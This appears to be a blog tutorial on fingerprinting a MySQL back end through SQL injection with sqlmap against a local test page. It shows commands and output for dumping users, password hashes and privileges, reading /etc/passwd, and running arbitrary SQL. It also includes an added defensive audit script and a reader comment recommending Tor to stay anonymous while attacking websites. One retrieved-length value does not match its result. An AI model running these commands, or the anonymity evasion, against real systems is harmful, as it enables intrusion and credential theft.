In the previous post on sqlmap basics we learnt how to use sqlmap to hack a vulnerable web application and fetch the list of databases, tables, columns and data rows. In this post we shall see how to do some simple fingerprinting on the remote database to find valuable information that can be used to assist in further exploitation of a system.
So let's say we have a vulnerable URL
http://localhost/weak.php?id=10
where the id parameter is not escaped properly in the PHP code and is therefore vulnerable to SQL injection. The command to list the databases would be
$ python ./sqlmap.py -u "http://localhost/weak.php?id=10" --dbs
Then use the -T, --columns and --dump options to list the tables of a database, the columns of a table and the data in a table, and so on.
Fingerprinting the remote system and its database
To find out more about the remote system and its database, use the option "-b" (banner). It tries to retrieve the exact banner of the database server. Let's try it on a MySQL database.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" -b
.....
[11:19:51] [INFO] the back-end DBMS is MySQL
[11:19:51] [INFO] fetching banner
[11:19:51] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:19:51] [INFO] retrieved: 5.1.61
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
banner: '5.1.61'
The output includes the banner text, "5.1.61". This is the MySQL banner and shows the exact MySQL version in use. Note that the "back-end DBMS: MySQL 5.0.11" line is sqlmap's own fingerprint, inferred from how the injection behaves, whereas the banner is what the server itself reports, so the banner is the value to trust for the exact version. With the version known, you can search for any known MySQL vulnerabilities affecting it.
The next command fetches the list of users along with their password hashes, privileges and roles.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10
..........
database management system users [5]:
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
.............
database management system users password hashes:
[*] [1]:
    password hash: NULL
[*] root [2]:
    password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
    password hash: NULL
........
[*] %root% (administrator) [27]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
Getting the current user, current database and hostname information
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --current-user --is-dba --current-db --hostname --threads=10
........
[11:32:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[11:32:33] [INFO] fetching current user
[11:32:33] [INFO] retrieving the length of query output
[11:32:33] [INFO] retrieved: 14
[11:32:38] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[11:32:38] [INFO] fetching current database
[11:32:38] [INFO] retrieving the length of query output
[11:32:38] [INFO] retrieved: 5
[11:32:40] [INFO] resumed: profile_data
current database: 'profile_data'
[11:32:40] [INFO] fetching server hostname
[11:32:40] [INFO] retrieving the length of query output
[11:32:40] [INFO] retrieved: 21
[11:32:48] [INFO] retrieved: localhost.localdomain
hostname: 'localhost.localdomain'
[11:32:48] [INFO] testing if current user is DBA
[11:32:48] [INFO] fetching current user
current user is DBA: False
So in the above output we have the current user, the current database and the hostname. The fact that the web application connects as root@localhost is itself the finding on the defending side: the application should use a dedicated account limited to the rights it actually needs.
Reading a system file
On MySQL, if the database user has the FILE privilege, it can read files from the file system. It can only read files that are world-readable or readable by the mysql user. Here is a quick example that reads the /etc/passwd file.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10
sqlmap stores the retrieved file in its output directory on the local file system, so that it can be read later.
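The user, hash and privilege listings above, together with the FILE privilege that this file-read step depends on, are exactly what a database administrator should audit on the defending side. The script below is an added example, not part of the original post or of sqlmap itself: it parses the output layout sqlmap prints for --passwords and --privileges (fed a constructed sample trimmed from the listing above) and reports the findings that matter, namely anonymous accounts, accounts with no password, and privileges such as FILE or SUPER on an account a web application should never connect as.

```python
import re
# Constructed sample in the layout sqlmap printed above (trimmed to the lines that matter)
SAMPLE = """\
database management system users password hashes:
[*] [1]:
    password hash: NULL
[*] root [2]:
    password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
    password hash: NULL
database management system users privileges:
[*] %root% (administrator) [2]:
    privilege: FILE
    privilege: SUPER
[*] %app% [1]:
    privilege: SELECT
"""
# Privileges that let an injected query reach files or the server, not just tables
DANGEROUS = {"FILE", "SUPER", "SHUTDOWN", "PROCESS", "CREATE USER"}
# "root [2]:" -> "root"; "[1]:" -> "" (anonymous); "%root% (administrator) [27]:" -> "%root%"
HEAD = re.compile(r"^(.*?)\s*(?:\([^)]*\))?\s*\[\d+\]:$")

def parse_enum(text):
    """Map each account to its password hashes and to its privileges."""
    hashes, privs, table, who = {}, {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("database management system users"):
            table = hashes if "hashes" in line else privs if "privileges" in line else None
        elif table is None:
            continue  # the plain --users list carries no per-account detail
        elif line.startswith("[*] "):
            who = HEAD.match(line[4:]).group(1).strip("%")
            table.setdefault(who, [])
        elif ":" in line and who is not None:
            table[who].append(line.split(":", 1)[1].strip())
    return hashes, privs

def audit(hashes, privs):
    """Return hardening findings a DBA should act on, one string each."""
    issues = []
    for name, hs in hashes.items():
        if name == "":
            issues.append("anonymous account present: drop it")
        if "NULL" in hs:
            issues.append(f"account '{name}': a host entry has no password")
    for name, ps in privs.items():
        bad = sorted(DANGEROUS & set(ps))
        if bad:
            issues.append(f"account '{name}' holds {', '.join(bad)}: unfit for a web app login")
    return issues
```

Fixing what it reports means dropping the anonymous accounts, setting passwords on every host entry, and giving the web application its own account with only the table rights it needs.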
Run an arbitrary SQL command
The --sql-query option can be used to run arbitrary SQL queries on the database.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --sql-query="select now();"
...........
[11:50:22] [INFO] retrieved: 2013-04-15 11:51:10
select now();: '2013-04-15 11:51:10'
The last line of the output is the result of the SQL query that was run on the remote database.
Conclusion
So with all the above information it becomes easier to get further into the system and eventually, where possible, take control of it. Sqlmap does a massive amount of work in discovering the database, its data and details about the operating system. But in most cases it will not, by itself, provide full control of the remote system in the form of a shell.
Further techniques need to be employed to gain greater control of the system and eventually root. We shall discuss those in upcoming tutorials.
cauz
March 18, 2014, 4:06 a.m.
When trying to exploit some website using sqlmap, it's a good idea to be anonymous. Sqlmap has excellent support for using common proxies or Tor.
First start Tor and ensure that it is running the SOCKS5 daemon on port 9050. Then use the SOCKS5 proxy with sqlmap as follows:
# ./sqlmap.py --tor --tor-type=SOCKS5 -u "http://www.hackable.org/view_section.php?id=10" ...
This post is a comment.